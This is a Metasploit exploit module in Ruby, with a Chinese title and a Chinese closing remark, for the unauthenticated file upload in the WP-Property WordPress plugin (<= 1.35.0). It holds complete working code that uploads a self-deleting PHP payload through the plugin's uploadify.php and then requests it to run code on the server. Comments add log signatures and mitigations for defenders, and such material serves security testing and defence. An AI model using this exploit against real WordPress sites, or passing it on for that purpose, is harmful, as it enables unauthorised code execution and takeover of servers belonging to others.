WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0 per the module description).
#
# The plugin bundles third-party/uploadify/uploadify.php, which accepts a
# multipart upload without any authentication and stores the file under a
# web-reachable directory, so an uploaded .php file is executed by the server.
#
# Notes for defenders reading this module:
# * Detection: web-server logs show a POST to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php with a
#   multipart part named "Filedata", followed by a GET for the path that the
#   script echoed back in its response body.
# * The uploaded stub is requested with :unlink_self => true, so the file is
#   presumably gone from disk after it has run; request logs are the more
#   durable evidence.
# * Mitigation: move to a plugin release newer than the affected range, remove
#   or block the bundled uploadify directory, and disable PHP execution in
#   directories that receive uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         => [
        'Sammy FORGIT', # initial discovery
        'James Fitts <fitts.james[at]gmail.com>' # metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'OSVDB', '82656' ],
        [ 'BID', '53787' ],
        [ 'EDB', '18987'],
        [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
      ],
      'Payload'        => { 'BadChars' => "\x00" },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [
        [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
        [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    wordpress_path = OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
    register_options([wordpress_path], self.class)
  end

  # Probes for the bundled uploadify.php script.
  #
  # Only reachability is tested: any HTTP 200 yields "Appears". The plugin
  # version is never inspected, so a patched or stubbed script that still
  # answers 200 is reported the same way as a vulnerable one.
  #
  # @return Exploit::CheckCode::Unknown when there is no response or a non-200
  #   status, Exploit::CheckCode::Appears otherwise
  def check
    base = target_uri.path
    base << '/' unless base.end_with?('/')

    probe = {
      'method' => 'GET',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    }
    response = send_request_cgi(probe)

    return Exploit::CheckCode::Unknown unless response && response.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP stub through uploadify.php and then requests it.
  #
  # Sequence visible on the wire (useful when writing detections):
  # 1. POST multipart/form-data to uploadify.php with a "Filedata" part whose
  #    filename is five random letters plus ".php", and a "folder" part naming
  #    the uploadify directory itself.
  # 2. The response body is expected to contain the stored file name; it is
  #    then used verbatim as the path of the follow-up request.
  # 3. GET for that path, which makes the server run the uploaded file.
  #
  # Fails with Exploit::Failure::UnexpectedReply when the upload response is
  # missing, is not a 200, or does not mention the uploaded file name.
  def exploit
    base = target_uri.path
    base << '/' unless base.end_with?('/')

    endpoint = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self asks the generated stub to delete itself once it has run.
    stub = get_write_exec_payload(:unlink_self=>true)

    plugin_dir = "#{base}wp-content/plugins/wp-property/third-party/uploadify/"

    form = Rex::MIME::Message.new
    form.add_part(stub, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    form.add_part(plugin_dir, nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a "--_Part_" boundary at the start of a line.
    body = form.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{endpoint} - Uploading payload #{@payload_name}")
    upload_request = {
      'method' => 'POST',
      'uri'    => "#{plugin_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{form.bound}",
      'data'   => body
    }
    response = send_request_cgi(upload_request)

    stored = response && response.code == 200 && response.body =~ /#{@payload_name}/
    fail_with(Exploit::Failure::UnexpectedReply, "#{endpoint} - Upload failed") unless stored

    # The server's reply is trusted as the location of the stored file.
    uploaded_path = response.body

    print_status("#{endpoint} - Executing payload #{@payload_name}")
    trigger_request = {
      'uri'    => uploaded_path,
      'method' => 'GET'
    }
    response = send_request_raw(trigger_request)
  end
end
不要问我这写的是什么、怎么利用,我是说 msf。